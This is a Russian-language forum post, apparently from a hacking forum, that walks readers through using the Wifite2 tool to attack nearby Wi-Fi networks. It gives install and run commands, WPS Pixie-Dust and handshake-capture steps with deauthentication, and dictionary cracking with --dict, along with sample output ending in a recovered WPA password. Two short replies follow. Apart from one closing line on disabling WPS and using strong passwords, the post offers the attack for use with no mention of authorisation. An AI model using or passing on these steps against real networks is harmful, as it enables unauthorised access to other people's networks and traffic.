Руководство по использованию Wifite2 для взлома Wi-Fi сетей

Добро пожаловать на наш форум!

Спасибо за посещение нашего сообщества. Пожалуйста, зарегистрируйтесь или войдите, чтобы получить доступ ко всем функциям.


Gibby

Автор
Команда проекта

Регистрация
Сообщений
1,635
Репутация
45
Сделок
В этой статье будет рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi.

w.png
В этой статье рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi сети. Узнайте, как выбрать наилучшую стратегию взлома каждой сети.

Wifite2 и Wifite: Краткий Обзор​

Wifite был одним из первых инструментов для автоматизированного взлома Wi-Fi. В сравнении с Besside-ng, Wifite предлагает больше сценариев атак, что делает его более гибким, но иногда и медлительным.
Wifite2 - это обновленная версия, которая работает быстрее и эффективнее. Она стала мощнее и предлагает более изощренные тактики взлома.


Сценарий Атаки на Wi-Fi с Использованием Wifite2​

Wifite2 реализует эффективный алгоритм для быстрого взлома близлежащих сетей. Программа сначала сканирует все каналы и сортирует сети по силе сигнала.
После сортировки Wifite2 отображает информацию о подключенных клиентах, наличии WPS и типе шифрования. На основе этой информации можно выбрать цели для атаки.



Подготовка и Пошаговая Реализация Атаки​

Шаг 1: Установка Wifite2​

Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга. Wifite2 установлен в Kali Linux по умолчанию.
Если Wifite2 не установлен в вашей системе, выполните следующие команды в терминале:

Код:
git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install

Теперь Wifite2 установлен в вашей системе. Введите команду

Код:
wifite -h

для получения информации о текущей версии.

Шаг 2: Подключение Wi-Fi карты​

Подключите беспроводной сетевой адаптер, совместимый с Kali Linux. Wifite2 автоматически выбирает адаптер и переключает карту в режим мониторинга. Совет: Убедитесь, что ваш адаптер поддерживает режим мониторинга, иначе атаки могут не сработать.

Шаг 3: Настройка Параметров и Поиск Целей​

Если вы знаете канал атаки, используйте параметр -c для его указания. Например:

Код:
wifite -c 11

После сканирования получите список доступных целей.

Шаг 4: Исследование Окружающей Территории и Выбор Целей​

Изучите список целей и выберите наиболее подходящие для атаки. Можно также использовать флаг -wps для поиска сетей с уязвимым WPS.

Код:
wifite -wps

Шаг 5: Автоматические Атаки на Однотипные Цели​

После выбора целей Wifite2 начнет автоматические атаки. Если первый сценарий не сработает, программа попробует другой метод.
Код:
[+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet)
[+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
[+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45
[+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients:1, deauth:11s, timeout:7m59s)
[+] successfully captured handshake
[+] saving copy of handshake to hs/handshake_TheDailyPlanet_69:96:43:69:D6:96_2018-12-24T00-33-18.cap saved
[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96
[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist
[!] Failed to crack handshake: common.txt did not contain password
[+] Finished attacking 1 target(s), exiting

Шаг 6: Сохранение и Анализ Результатов​

Результаты атаки можно сохранить для дальнейшего анализа. Если атака увязла, можно использовать сочетание клавиш Ctrl-C для остановки.

Код:
[+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146 (DeAuth:Timeout) (Timeouts:15)
[!] interrupted
[+] 1 attack(s) remain, do you want to continue?
[+] type c to continue or s to stop:

Если мы смогли получить 4-этапное рукопожатие, то можно перебрать пароли с помощью флага --dict и пути к словарю.

Код:
wifite -wpa --dict ./passwords.txt

Пример успешной дешифровки:
Код:
[+] Cracked WPA Handshake PSK: christmasham
[+] Access Point Name: Bourgeois Pig Guest
[+] Access Point BSSID: DE:F2:86:EC:CA:A0
[+] Encryption: WPA
[+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): christmasham
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting


Wifite2 – очень хороший пример, когда даже новичок может реализовать эффективную атаку на сети, обладающие наиболее распространенными уязвимостями, как, например, пин в WPS или слабые пароли. С увеличением уровня автоматизации более продвинутых атак, важно быть в тренде и знать наиболее эффективные методы взлома Wi-Fi сетей. В целом, наилучший способ защитить сеть от утилит наподобие Wifite2 – отключить WPS и использовать сильный пароль, который знает ограниченный круг лиц.

Важно отметить, что, если выбрать все цели, Wifite2 будет осуществлять атаки на все сети.
 
Отличные статьи бро, интересно
 
Большинство роутеров не берется( Есть авторские коментарии?
 
Сверху